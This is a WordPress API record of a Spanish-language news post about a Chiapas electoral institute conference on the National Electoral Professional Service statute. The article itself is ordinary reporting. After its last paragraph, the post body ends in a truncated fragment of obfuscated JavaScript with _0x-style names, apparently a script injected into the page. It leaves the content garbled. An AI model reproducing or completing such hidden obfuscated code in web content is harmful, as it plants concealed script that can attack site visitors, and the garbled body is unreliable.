{"id":1700,"date":"2022-04-28T02:57:30","date_gmt":"2022-04-28T02:57:30","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=1700"},"modified":"2022-04-28T02:57:32","modified_gmt":"2022-04-28T02:57:32","slug":"realiza-iepc-conferencia-conociendo-el-estatuto-del-servicio-profesional-electoral-nacional-y-personal-de-la-rama-administrativa","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=1700","title":{"rendered":"Realiza IEPC Conferencia: \u201cConociendo el Estatuto del Servicio Profesional Electoral Nacional y Personal de la Rama Administrativa\u201d"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"484\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220427-WA0014-1024x484.jpg\" alt=\"\" class=\"wp-image-1701\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220427-WA0014-1024x484.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220427-WA0014-300x142.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220427-WA0014-768x363.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220427-WA0014.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u2022 Esta conferencia se realiz\u00f3 con la finalidad de conocer las modificaciones de los diferentes mecanismos que conforma el Servicio Profesional, a partir de la reforma del 2020 del Estatuto.<\/p>\n\n\n\n<p>Tuxtla Guti\u00e9rrez, Chiapas. 27 de abril de 2022. El Instituto de Elecciones y Participaci\u00f3n Ciudadana (IEPC) de Chiapas, llev\u00f3 a cabo la Conferencia: \u201cConociendo el Estatuto del Servicio Profesional Electoral Nacional y Personal de la Rama Administrativa\u201d, presentada por Ma del Refugio Garc\u00eda L\u00f3pez, Titular de la Direcci\u00f3n Ejecutiva del Servicio Profesional Electoral Nacional (DESPEN), y Carmen Gloria Pumarino Bravo, Titular de la Direcci\u00f3n de Profesionalizaci\u00f3n de la DESPEN, ambas del Instituto Nacional Electoral.<\/p>\n\n\n\n<p>La Comisi\u00f3n Permanente de Seguimiento al Servicio Profesional Electoral Nacional (CPSSPEN) del IEPC, fue la encargada de organizar esta Conferencia, que tuvo como objetivo dar a conocer las modificaciones de los diferentes mecanismos que conforma el Servicio Profesional, a partir de la reforma del 2020 del Estatuto.<\/p>\n\n\n\n<p>El consejero presidente Oswaldo Chac\u00f3n Rojas, enfatiz\u00f3 que parte del \u00e9xito y la confianza que existe en las instituciones electorales, se basa en la profesionalizaci\u00f3n de sus integrantes, pues dijo que \u201cla importancia del SPEN radica en buscar que las y los operadores de los diferentes \u00f3rganos electorales se capaciten, a fin de ofrecer un mejor desempe\u00f1o laboral, con altos est\u00e1ndares de calidad&#8221;. Inform\u00f3 que el IEPC fue el Organismo P\u00fablico Local que m\u00e1s plazas del SPEN incorpor\u00f3 a la operatividad de este organismo, pues es un modelo que destaca como uno de los m\u00e1s respetados del pa\u00eds.<\/p>\n\n\n\n<p>Por su parte, la consejera Mar\u00eda Magdalena Vila Dom\u00ednguez, Presidenta de la CPSSPEN, destac\u00f3 que la formaci\u00f3n del personal integrante del SPEN, busca el desarrollo de las competencias requeridas para desempe\u00f1ar cada cargo y cada puesto de manera responsable, disciplinada, con las capacidades necesarias, tal como lo establece el cat\u00e1logo del servicio y el diccionario de competencias. Agreg\u00f3 que las personas que pertenecen al SPEN, son de lo mejor que existe en el servicio p\u00fablico en M\u00e9xico, por su constante capacitaci\u00f3n y especializaci\u00f3n, siempre al servicio de la ciudadan\u00eda.<\/p>\n\n\n\n<p>En su ponencia, Ma del Refugio Garc\u00eda L\u00f3pez explic\u00f3 de manera detallada el trabajo que realiza la DESPEN, as\u00ed como el Estatuto vigente del INE, el cual regula las condiciones generales de trabajo, los derechos y obligaciones de sus integrantes, as\u00ed como los criterios para la definici\u00f3n de salarios, compensaciones, procedimientos de selecci\u00f3n, ingreso, capacitaci\u00f3n, promoci\u00f3n, evaluaci\u00f3n y permanencia, del personal de carrera como administrativo del INE y de los OPL.<\/p>\n\n\n\n<p>A\u00f1adi\u00f3 que el Estatuto, clarifica los mecanismos de ingreso, evaluaci\u00f3n, promoci\u00f3n y sanci\u00f3n, aplicables para todas y todos los trabajadores que forman parte de las autoridades integrantes del sistema nacional de elecciones.<\/p>\n\n\n\n<p>Durante su intervenci\u00f3n, Carmen Gloria Pumarino Bravo expuso los diversos aspectos del Programa de Formaci\u00f3n de la DESPEN, enfatizando que en la actualidad, se cuenta con procedimientos espec\u00edficos de acciones correctivas y no punitivas, es decir, ahora se detectan \u00e1reas de oportunidad en las capacidades y competencias relativas al desempe\u00f1o de las y los integrantes, para mejorar su labor diaria, lo cual redunda positivamente en la evaluaci\u00f3n y fortalecimiento del desempe\u00f1o del personal que forma parte del SPEN.<\/p>\n\n\n\n<p>En esta Conferencia, estuvieron presentes el encargado del Despacho de la Delegaci\u00f3n del INE Chiapas, Gonzalo Rodr\u00edguez Miranda; las y los consejeros electorales Blanca Estela Parra Ch\u00e1vez, Sof\u00eda Margarita S\u00e1nchez Dom\u00ednguez, Guillermo Arturo Rojo Mart\u00ednez, Sofia Mart\u00ednez De Castro Le\u00f3n y Edmundo Henr\u00edquez Arellano, as\u00ed como funcionarias y funcionarios del IEPC, pertenecientes al SPEN.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 Esta conferencia se realiz\u00f3 con la finalidad de conocer las modificaciones de los diferentes mecanismos que conforma el Servicio Profesional, a partir de la reforma del 2020 del Estatuto. Tuxtla Guti\u00e9rrez, Chiapas. 27 de abril de 2022. El Instituto de Elecciones y Participaci\u00f3n Ciudadana (IEPC) de Chiapas, llev\u00f3 a cabo la Conferencia: \u201cConociendo el &hellip;<\/p>\n","protected":false},"author":2,"featured_media":1701,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-1700","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1700","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1700"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1700\/revisions"}],"predecessor-version":[{"id":1702,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1700\/revisions\/1702"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/1701"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1700"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1700"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1700"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}